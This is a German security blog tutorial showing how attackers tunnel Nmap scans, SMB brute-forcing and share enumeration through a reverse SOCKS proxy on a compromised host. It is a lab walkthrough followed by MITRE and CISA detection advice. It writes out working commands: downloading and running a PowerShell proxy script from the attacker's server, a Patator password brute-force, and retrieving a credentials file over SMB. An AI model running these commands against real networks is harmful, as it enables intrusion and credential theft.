So nutzen APTs Reverse Proxies, um interne Netzwerke mit Nmap auszuspionieren

Dieser Leitfaden für Nmap mit Reverse Proxies behandelt Proxy-Chains sowie Bekämpfung und Erkennung.
Tokyoneon
5 minute gelesen
Letzte aktualisierung 4. Januar 2022

Mit Reverse Proxies können Angreifer (APTs) Angriffe in gesicherte Umgebungen schleusen, da sie damit die Beschränkungen von Firewalls für eingehenden Datenverkehr umgehen können. Vor kurzer Zeit hat die Methode es in die Nachrichten geschafft, als das Organisationsnetzwerk einer US-Bundesbehörde Opfer eines solchen Angriffs wurde. Die Angreifer verwendeten eine Variante von Invoke-SocksProxy, einem Open-Source-Reverse-Proxy-Tool, das auf GitHub zu finden ist.

Beschreibung von der Cybersecurity and Infrastructure Security Agency (CISA):

Der Cyber-Bedrohungsakteur etablierte Persistenz und C2 im Opfernetzwerk, indem er einen persistenten SSH-Tunnel/Reverse-SOCKS-Proxy erstellte … Mit einem PowerShell-Skript [Invoke-SocksProxy.ps1] wurde ein Reverse-SMB-SOCKS-Proxy erstellt, der Verbindungen zwischen dem vom Angreifer kontrollierten VPS … und dem Dateiserver des Opfers ermöglichte … Invoke-SocksProxy.ps1 erstellt einen Reverse-Proxy vom lokalen Rechner zur Infrastruktur des Angreifers …

Laden Sie unser Whitepaper zur Sicherheitsanalyse herunter

"Unternehmen versäumen es oft, Hacks rechtzeitig zu erkennen, weil weniger als 20 % der Datendiebstähle intern entdeckt werden. - Gartner"

Was ist ein Reverse Proxy?

Wie vom MITRE ATT&CK Framework definiert:

Angreifer können einen Verbindungs-Proxy verwenden, um den Netzwerkdatenverkehr zwischen Systemen zu leiten oder als Vermittler für die Netzwerkkommunikation zu fungieren … um direkte Verbindungen zu ihrer Infrastruktur zu vermeiden … Angreifer nutzen solche Proxies, um die C2-Kommunikation zu verwalten [oder] die Anzahl der simultanen ausgehenden Netzwerkverbindungen zu reduzieren … Angreifer können mehrere Proxys verketten, um die Quelle des bösartigen Datenverkehrs zusätzlich zu verschleiern …

Einrichten des Angriffs

Die Netzwerktopologie enthält mehrere Geräte, die mit einem internen Netzwerk (172.16.0.1/24) verbunden sind. Der Einfachheit halber nehmen wir an, dass der Angreifer eine Reverse Shell auf Host A (172.16.0.3) mit einem schädlichen Word-Dokument eingerichtet hat (siehe unten). Mit diesem Grad der Kompromittierung kann das Kali-System des Angreifers nicht direkt mit den SMB- und HTTP-Servern interagieren. Das Ziel ist es, Dienste auf 172.16.0.1/24 zu entdecken, während Host A als Proxy verwendet wird.

Reverse-Proxy für interne Netzwerke

In diesem Beispiel verbindet sich der kompromittierte Host über einen Netcat-Listener auf TCP/4444 (siehe unten) mit dem Virtual Private Server (VPS) des Angreifers. Die Netcat-Verbindung muss offen bleiben, da sie in einem späteren Schritt benötigt wird.

Öffnen Sie in Kali ein neues Terminal und verbinden Sie sich über SSH mit dem VPS. Erhöhen Sie mit dem su-Befehl auf eine Root-Shell.

Verwenden Sie den folgenden Git-Befehl, um mein Repository Invoke-SocksProxy zu klonen. Das Repository enthält zwei Dateien: ReverseSocksProxyHandler.py und Invoke-SocksProxy.ps1.

root@vps > cd /opt; git clone https://github.com/tokyoneon/Invoke-SocksProxy

Das Skript ReverseSocksProxyHandler.py öffnet die Ports 443 und 1337: Port 443 erhält eingehende Verbindungen von Host A. Port 1337 fungiert als Proxy-Port, konfiguriert mit Proxy-Chains in Kali. Bei der Ausführung gibt das Terminal die folgende Ausgabe und sollte für die Dauer des Angriffs geöffnet bleiben.

root@vps > cd /opt/Invoke-SocksProxy; ./ReverseSocksProxyHandler.py

Das Skript Invoke-SocksProxy.ps1 soll auf dem kompromittierten Host ausgeführt werden. Öffnen Sie in Kali ein neues Terminal und verbinden Sie sich per SSH erneut mit dem VPS. Ändern Sie die hardcodierte VPS-Adresse in Invoke-SocksProxy.ps1 und hosten Sie sie auf einem HTTP-Server (z. B. Apache, Nginx oder http.server).

Wechseln Sie im Netcat-Terminal in das Verzeichnis $env:TEMP unter Host A. Laden Sie anschließend Invoke-SocksProxy.ps1 vom VPS herunter und führen Sie es aus. Es erzeugt keine Ausgabe, muss aber geöffnet bleiben. Ein Angreifer kann geplante Aufgaben verwenden, um die Ausführung in einem echten Szenario zu automatisieren. Wir werden das Terminal für diese Demonstration offenhalten, um zu verstehen, was vor sich geht.

Ps > cd $env:TEMP

Ps > iwr 192.168.56.102/Invoke-SocksProxy.ps1 -outfile isp.ps1

Ps > .\isp.ps1

Installieren Sie in Kali proxychains4 und ändern Sie die Datei /etc/proxychains4.conf. Fügen Sie die VPS-Adresse und den Port 1337 am Ende der Konfigurationsdatei hinzu.

sudo apt-get install -y proxychains4 && sudo nano /etc/proxychains4.conf

Das alles dient der Vorbereitung unseres Angriffs. Mit ReverseSocksProxyHandler und Invoke-SocksProxy, die auf dem VPS und Host A ausgeführt werden, lassen sich nun Angriffe per Proxy in das interne Netzwerk übertragen.

Proxy-Nmap und Crackmapexec mit Proxy-Chains

Es gibt Einschränkungen bei der Verwendung von Nmap mit Proxychains. Nmap schlägt beispielsweise bei der Host-Entdeckung fehl und kann keine Ping-Scans (ICMP) über SOCKS5 durchführen. Dennoch sind Dienst- und Port-Entdeckung noch immer effektiv (obwohl etwas langsam, da sie vollständige TCP-Scans erfordern).

Der folgende Nmap-Scan führt einen TCP-Scan (-sT) durch, wobei Host-Entdeckung (-Pn) und DNS-Auflösung (-n) deaktiviert sind. Die Argumente sind erforderlich, um Nmap mit Proxy-Chains zu verwenden. Beachten Sie den SMB-Server unter 172.16.0.4:445 und den HTTP-Server unter 172.16.0.115:80.

proxychains nmap -sT -Pn -n -p445,139,88,80 172.16.0.4,115

Bild von z07

Mit dem folgenden Patator-Befehl können Sie Brute-Force-Angriffe per Proxy durchführen. Proxy-Chain-Meldungen kollidieren mit der Ausgabe von Patator; verwenden Sie -q, um diese zu unterdrücken. Achten Sie auf das Passwort („Passw0rd!“), das während des Angriffs ermittelt wurde.

proxychains -q patator smb_login host=172.16.0.4 port=445 user=victim2 password=FILE0 0=/usr/share/wordlists/nmap.lst -t 1 -x ignore:mesg=’STATUS_LOGON_FAILURE’

Um Freigaben auf dem kompromittierten SMB-Server anzuzeigen, verwenden Sie den folgenden crackmapexec-Befehl mit dem ermittelten Kennwort. Beachten Sie die Freigabe „Private“ mit Lese- und Schreibberechtigungen.

proxychains crackmapexec smb 172.16.0.4 -u ‘victim2’ -p ‘Passw0rd!’ –shares

Verwenden Sie den Befehl smbclient, um auf den Inhalt der Freigabe zuzugreifen und das gewünschte Verzeichnis (“/Private”) anzuzeigen. Achten Sie auf die Datei „credentials.txt“ in der Freigabe. Verwenden Sie den Befehl get mit smbclient, um die Datei abzurufen und sie lokal in Kali zu speichern.

proxychains smbclient //172.16.0.4/Private -U ‘victim2%Passw0rd!’

HTTP-Server sind ebenfalls über ähnliche Proxy-Chains-Befehle zugänglich. Allerdings verfügt Firefox über eingebaute Funktionen, die den Umgang mit Proxys einfacher machen.

Öffnen Sie in Kali Firefox und gehen Sie zu Einstellungen > Netzwerkeinstellungen > Einstellungen. Verwenden Sie einen „SOCKS Host“ mit der IP-Adresse und dem Port des VPS (siehe unten). Klicken Sie auf „OK“, um die Konfiguration zu speichern.

Öffnen Sie dann eine neue Registerkarte und navigieren Sie zu einem beliebigen HTTP-Server im internen Netzwerk (z. B. 172.16.0.115:80).

Wenn Sie die HTTP-Serverprotokolle auf 172.16.0.115 betrachten, scheinen die Anfragen von 172.16.0.3 (Host A) zu stammen – dem kompromittierten Host.

Erkennung und Bekämpfung

Laut Definition des MITRE ATT&CK Frameworks:

Analysieren Sie Netzwerkdaten auf ungewöhnliche oder abnormale Datenflüsse. Das können beispielsweise Clients sein, die deutlich mehr Daten senden, als sie von Servern empfangen, die nicht miteinander kommunizieren sollen und es auch oft nicht tun. Prozesse, die normalerweise keine Netzwerkkommunikation umfassen oder noch nie gesehen wurden, die aber dennoch das Netzwerk nutzen, sind verdächtig. Analysieren Sie Paketinhalte, um Kommunikation zu erkennen, die nicht dem erwarteten Protokollverhalten für den verwendeten Port entspricht.

  • Netzwerkverkehr filtern: Der Verkehr zu bekannten Anonymitätsnetzwerken und C2-Infrastrukturen kann durch die Verwendung von Netzwerkzulassungs- und -sperrlisten blockiert werden. Beachten Sie, dass solche Sperrungen durch andere Techniken wie Domain Fronting umgangen werden können.
  • Network Intrusion Prevention: Systeme zur Erkennung und Prävention von Netzwerkintrusion, die mithilfe von Netzwerksignaturen den Datenverkehr von bestimmter bösartiger Malware identifizieren, können zur Eindämmung von Aktivitäten auf der Netzwerkebene eingesetzt werden. Signaturen gehören oft zu eindeutigen Indikatoren innerhalb von Protokollen und basieren möglicherweise auf dem spezifischen C2-Protokoll, das von einem bestimmten Angreifer oder Tool verwendet wird. Wahrscheinlich unterscheiden sie sich bei verschiedenen Malware-Familien und -Versionen. Es ist davon auszugehen, dass Angreifer die Signaturen ihrer C2-Tools im Laufe der Zeit ändern oder Protokolle so konstruieren, dass die Erkennung durch gängige Verteidigungstools vermieden wird.
  • SSL/TLS-Inspektion: Wenn es möglich ist, den HTTPS-Verkehr zu inspizieren, können die erfassten Daten auf Verbindungen analysiert werden, die möglicherweise auf Domain Fronting hindeuten.

Zusätzlich empfiehlt die CISA Unternehmen, die folgenden Best Practices zu verwenden:

  • Implementierung einer Multi-Faktor-Authentifizierung, insbesondere für privilegierte Konten
  • Verwendung separater administrativer Konten für separate Administrations-Workstations
  • Implementierung des Prinzips der notwendigsten Berechtigung beim Datenzugriff
  • Sicherung von RDP und anderen Fernzugriffslösungen mit Multi-Faktor-Authentifizierung und „Jump Boxes“ für den Zugriff
  • Implementierung und Wartung von Verteidigungstools auf allen Endpoints
  • Durchgehend aktuelle Software-Updates

Folgen Sie mir auf Twitter @tokyoneon_ und auf GitHub , um über meine aktuellen Projekte auf dem Laufenden zu bleiben.

Wie soll ich vorgehen?

Im Folgenden finden Sie drei Möglichkeiten, wie Sie das Datenrisiko in Ihrem Unternehmen verringern können:

1

Vereinbaren Sie eine Demo mit uns, um Varonis in Aktion zu erleben. Wir passen die Session an die Datensicherheitsanforderungen Ihres Unternehmens an und beantworten alle Fragen.

2

Sehen Sie sich ein Beispiel unserer Datenrisikobewertung an und erfahren Sie, welche Risiken in Ihrer Umgebung lauern könnten. Varonis DRA ist völlig kostenlos und bietet einen klaren Weg zur automatischen Sanierung.

3

Folgen Sie uns auf LinkedIn, YouTubeund X (Twitter), um kurze Einblicke in alle Themen der Datensicherheit zu erhalten, einschließlich Data Security Posture Management (DSPM), Bedrohungserkennung, KI-Sicherheit und mehr.

Testen Sie Varonis gratis.

Detaillierte Zusammenfassung Ihrer Datensicherheitsrisiken
Umsetzbare Empfehlungen, die auf Ihre Bedürfnisse zugeschnitten sind
Ohne Bedingungen und Auflagen

Weiter lesen

Varonis bewältigt Hunderte von Anwendungsfällen und ist damit die ultimative Plattform, um Datenschutzverletzungen zu stoppen und Compliance sicherzustellen.

was-ist-ein-proxy-server-und-wie-funktioniert-er?
Was ist ein Proxy-Server und wie funktioniert er?
Erfahren Sie mehr über Proxys! Unser Leitfaden zum Thema Proxy-Server erläutert die Vorteile, Risiken und alles dazwischen. 
diese-vier-fragen-sollten-ceos-ihren-cios-stellen-(wenn-sie-sich-vor-den-antworten-nicht-fürchten)
Diese vier Fragen sollten CEOs ihren CIOs stellen (wenn sie sich vor den Antworten nicht fürchten)
Als Geschäftsführer oder Vorstand kommt man mittlerweile nicht mehr umhin, sich auch mit dem Thema IT-Sicherheit zu beschäftigen, sei es durch gesetzliche Vorgaben wie der DSGVO oder durch prominente Datenschutzverletzungen...
die-11-besten-malware-analysetools-und-ihre-funktionen
Die 11 besten Malware-Analysetools und ihre Funktionen
Eine Übersicht über 11 hervorragende Malware-Analyse-Tools und deren Einsatzmöglichkeiten, darunter PeStudio, Process Hacker, ProcMon, ProcDot, Autoruns und andere.
was-ist-netzwerksegmentierung?
Was ist Netzwerksegmentierung?
Unter Netzwerksegmentierung versteht man die Aufteilung eines Computernetzwerks in kleinere physische oder logische Komponenten, um die Sicherheit zu erhöhen und Daten zu schützen.